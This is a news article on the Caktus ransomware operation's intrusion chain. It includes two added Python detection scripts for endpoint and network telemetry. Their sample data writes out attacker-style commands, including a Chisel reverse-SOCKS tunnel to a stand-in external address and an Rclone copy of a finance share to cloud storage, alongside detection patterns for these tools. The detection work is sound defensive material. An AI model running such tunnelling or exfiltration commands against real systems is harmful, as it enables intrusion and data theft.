    Caktus Ransomware creates a thorny situation on the internet

    alf9872000

    • 346 views
    • 3 minutes
    A new ransomware operation, named Caktus ransomware, has been targeting large commercial entities since March this year. The threat actor behind Caktus has been exploiting vulnerabilities in VPN appliances to gain initial access to networks.


    This operation has been seeking significant payouts from its victims, and while it employs common ransomware tactics such as file encryption and data theft, it uses unusual methods to avoid detection.


    According to researchers at Kroll, a corporate investigation and risk consulting firm, the Caktus ransomware operation has been exploiting known vulnerabilities in Fortinet VPN appliances to gain initial access to victim networks.


    The researchers observed that in every incident investigated, the attacker pivoted into the network from the VPN server using a VPN service account. This pattern highlights the importance of patching and securing VPN appliances and other network entry points so that threat actors cannot exploit known vulnerabilities.


    [Image: Caktus-ransomware_1.jpg] Caktus ransomware has been researched by Kroll

    Caktus ransomware's unique method of self-encryption

    What sets Caktus apart from other ransomware operations is its use of encryption to protect the ransomware binary itself. The threat actor uses a batch script that extracts the encryptor binary with 7-Zip. The whole process is unusual, and researchers believe it is done to keep the encryptor from being detected: Caktus essentially encrypts itself, making it harder for antivirus and network monitoring tools to spot.


    Once inside a network, Caktus uses a scheduled task for persistent access and relies on SoftPerfect Network Scanner (netscan) to identify interesting targets on the network. The threat actor uses PowerShell commands to enumerate endpoints, identify user accounts, and ping remote hosts for deeper reconnaissance. Kroll investigators found that Caktus also used a modified variant of the open-source PSnmap tool and tried multiple remote access methods through legitimate tools and the Go-based proxy tool Chisel.


    Caktus ransomware steals data from victims and transfers it to cloud storage using the Rclone tool. After exfiltrating the data, the hackers use a PowerShell script called TotalExec to automate deployment of the encryptor. The encryption routine in Caktus attacks is distinctive, though a similar process has recently been adopted by the BlackBasta ransomware gang.
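    The two paragraphs above describe a recognisable chain on the endpoint: an archive being unpacked with 7-Zip, a scheduled task being created, network scanning and PowerShell host enumeration, a Chisel tunnel, and an Rclone copy to cloud storage. A defender can look for that chain as a whole rather than for any single tool. The script below is an added example, not code from the article or from Kroll; it runs over constructed process-creation events in a simplified Sysmon-style JSON format, tags each event with the stage it resembles, and flags any account whose activity spans several stages, since the researchers noted the actor operated from a single VPN service account. The hostnames, usernames, paths, the 203.0.113.5 address and the exact command lines are all made up, and the indicator patterns are assumptions a team would tune to its own environment.

```python
import json
import re
from collections import defaultdict

# Constructed sample telemetry (Sysmon Event ID 1 style, reduced to JSON
# lines). Hosts, users, paths and the 203.0.113.5 address are made up.
SAMPLE_EVENTS = r"""
{"host":"WS01","user":"CORP\\vpn-svc","image":"C:\\Tools\\7z.exe","cmdline":"7z.exe x -pREDACTED pkg.7z -oC:\\Tools"}
{"host":"WS01","user":"CORP\\vpn-svc","image":"C:\\Windows\\System32\\schtasks.exe","cmdline":"schtasks.exe /create /sc minute /mo 5 /tn Updater /tr C:\\Tools\\svc.exe"}
{"host":"WS01","user":"CORP\\vpn-svc","image":"C:\\Tools\\netscan.exe","cmdline":"netscan.exe"}
{"host":"WS01","user":"CORP\\vpn-svc","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -c Get-ADComputer -Filter * | % { Test-Connection $_.Name -Count 1 }"}
{"host":"WS01","user":"CORP\\vpn-svc","image":"C:\\Tools\\chisel.exe","cmdline":"chisel.exe client 203.0.113.5:8080 R:socks"}
{"host":"FS02","user":"CORP\\vpn-svc","image":"C:\\Tools\\rclone.exe","cmdline":"rclone.exe copy D:\\Shares\\Finance remote:bucket --transfers 16"}
{"host":"WS07","user":"CORP\\alice","image":"C:\\Windows\\System32\\schtasks.exe","cmdline":"schtasks.exe /create /sc daily /tn Backup /tr C:\\Backup\\run.bat"}
{"host":"WS07","user":"CORP\\alice","image":"C:\\Program Files\\7-Zip\\7z.exe","cmdline":"7z.exe a report.7z report.docx"}
"""

# Assumed indicator patterns, one per stage of the chain described in the
# article. Each is matched against "<image> <cmdline>" so either the binary
# name or its arguments can trigger it.
STAGE_RULES = [
    # 7-Zip extracting (x) a password-protected (-p) archive, i.e. unpacking a
    # protected payload rather than ordinary archive creation.
    ("staging",     re.compile(r"7z(?:\.exe)?\s+x\b.*-p", re.I)),
    ("persistence", re.compile(r"schtasks(?:\.exe)?\s+/create\b", re.I)),
    ("recon",       re.compile(r"netscan\.exe|psnmap|Test-Connection|Get-ADComputer|Get-ADUser", re.I)),
    ("tunnel",      re.compile(r"\bchisel(?:\.exe)?\b", re.I)),
    ("exfil",       re.compile(r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b", re.I)),
]


def stage_hits(lines):
    """Map each user to the set of (host, stage) pairs its processes matched."""
    hits = defaultdict(set)
    for line in lines.strip().splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        text = f"{ev['image']} {ev['cmdline']}"
        for stage, pattern in STAGE_RULES:
            if pattern.search(text):
                hits[ev["user"]].add((ev["host"], stage))
    return hits


def flag_accounts(lines, min_stages=3):
    """Return accounts whose activity covers at least min_stages distinct
    stages, across any number of hosts. A lone scheduled task or a lone
    7-Zip run is normal admin work; several stages from one account is not."""
    flagged = []
    for user, pairs in stage_hits(lines).items():
        stages = {stage for _, stage in pairs}
        hosts = {host for host, _ in pairs}
        if len(stages) >= min_stages:
            flagged.append({"user": user,
                            "stages": sorted(stages),
                            "hosts": sorted(hosts)})
    return sorted(flagged, key=lambda r: r["user"])


if __name__ == "__main__":
    print(json.dumps(flag_accounts(SAMPLE_EVENTS), indent=2))
```

    In the sample data the constructed VPN service account touches five stages on two hosts and is reported, while the ordinary user who creates a daily backup task and zips a document is not: the threshold on distinct stages is what keeps this from firing on routine administration. In production the same logic would run over the EDR or Sysmon feed, keyed on the real account and host fields.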


    [Image: Caktus-ransomware_2.jpg] Caktus ransomware is after victims' data

    The impact of Caktus ransomware attacks

    While there is no public information about the ransoms that Caktus demands from its victims, sources suggest that they are in the millions. Although the hackers do not appear to have set up a leak site, they do threaten victims with publishing the stolen files unless they receive payment. The incursions by Caktus so far likely leveraged vulnerabilities in the Fortinet VPN appliance and followed the standard double-extortion approach by stealing data before encrypting it.

    How to protect yourself against Caktus ransomware?

    To protect against the final and most damaging stages of a ransomware attack, it is recommended to apply the latest software updates, monitor the network for large outbound data transfers that could indicate exfiltration, and respond quickly.
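    The recommendation above to watch for large exfiltration is easiest to act on at the network edge, where an Rclone upload to cloud storage shows up as an unusual volume of outbound bytes from one internal host. The script below is an added example, not part of the article or of any Kroll guidance: it reads constructed flow records, sums outbound bytes per internal source per hour, and raises an alert when an hour both exceeds an absolute size and dwarfs that host's own median hourly volume. The 10.0.0.0/8 internal range, the thresholds, the timestamps and all addresses (documentation ranges 203.0.113.0/24 and 198.51.100.0/24 stand in for cloud destinations) are assumptions.

```python
import csv
import io
import ipaddress
import statistics
from collections import defaultdict
from datetime import datetime, timezone

# Assumed corporate address space; anything outside it counts as external.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Constructed flow records: a file server (10.0.2.5) with a quiet daytime
# baseline, then ~2.4 GB pushed to one external host at 02:00; a workstation
# (10.0.1.30) copying 5 GB to an internal backup server (should not alert);
# and a normal small external flow from 10.0.1.20.
SAMPLE_FLOWS = """\
ts,src,dst,dst_port,bytes_out
2023-05-10T09:05:00Z,10.0.2.5,203.0.113.10,443,1800000
2023-05-10T10:12:00Z,10.0.2.5,203.0.113.10,443,2100000
2023-05-10T11:40:00Z,10.0.2.5,198.51.100.7,443,1900000
2023-05-10T12:03:00Z,10.0.2.5,203.0.113.10,443,2000000
2023-05-10T13:15:00Z,10.0.2.5,203.0.113.10,443,1700000
2023-05-11T02:10:00Z,10.0.2.5,203.0.113.10,443,900000000
2023-05-11T02:25:00Z,10.0.2.5,203.0.113.10,443,800000000
2023-05-11T02:48:00Z,10.0.2.5,203.0.113.10,443,700000000
2023-05-11T02:30:00Z,10.0.1.30,10.0.3.9,445,5000000000
2023-05-11T02:35:00Z,10.0.1.20,203.0.113.10,443,3000000
"""


def parse_flows(text):
    """Parse CSV flow records into dicts with typed timestamp, addresses and byte count."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        rows.append({
            "ts": datetime.strptime(r["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc),
            "src": ipaddress.ip_address(r["src"]),
            "dst": ipaddress.ip_address(r["dst"]),
            "bytes": int(r["bytes_out"]),
        })
    return rows


def is_internal(ip):
    return any(ip in net for net in INTERNAL_NETS)


def outbound_by_hour(flows):
    """Sum bytes per (source, hour) for flows that leave the internal ranges only."""
    agg = defaultdict(int)
    for f in flows:
        if is_internal(f["src"]) and not is_internal(f["dst"]):
            hour = f["ts"].replace(minute=0, second=0, microsecond=0)
            agg[(str(f["src"]), hour)] += f["bytes"]
    return agg


def flag_exfil(text, abs_threshold=500_000_000, ratio=10):
    """Alert on hours where a host's external volume is both large in absolute
    terms and at least `ratio` times its own median hourly volume. A host with
    no history (a single window) is judged on the absolute threshold alone."""
    per_src = defaultdict(dict)
    for (src, hour), total in outbound_by_hour(parse_flows(text)).items():
        per_src[src][hour] = total

    alerts = []
    for src, hours in per_src.items():
        baseline = statistics.median(hours.values()) if len(hours) > 1 else 0
        for hour, total in sorted(hours.items()):
            if total >= abs_threshold and total >= ratio * baseline:
                alerts.append({
                    "src": src,
                    "hour": hour.isoformat(),
                    "bytes": total,
                    "baseline": baseline,
                    # Off-hours transfers deserve a higher priority in triage.
                    "off_hours": hour.hour < 6 or hour.hour >= 20,
                })
    return alerts


if __name__ == "__main__":
    for alert in flag_exfil(SAMPLE_FLOWS):
        print(alert)
```

    The per-host median is what makes the rule usable: a mail relay or backup gateway that legitimately sends gigabytes every hour has a high baseline and stays quiet, while a file server that normally sends a couple of megabytes and suddenly sends gigabytes at two in the morning is exactly the case the article warns about. The internal-only transfer is deliberately ignored here; moving data to an internal staging host is better caught by the endpoint telemetry rule than by edge flow data.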


    Organizations should prioritize patching vulnerabilities in their VPN appliances and other network entry points so that threat actors cannot exploit known vulnerabilities. Additionally, implementing multi-factor authentication and endpoint security solutions provides an extra layer of defense against ransomware attacks. See also: the Best VPN Extensions for Google Chrome.


    Source
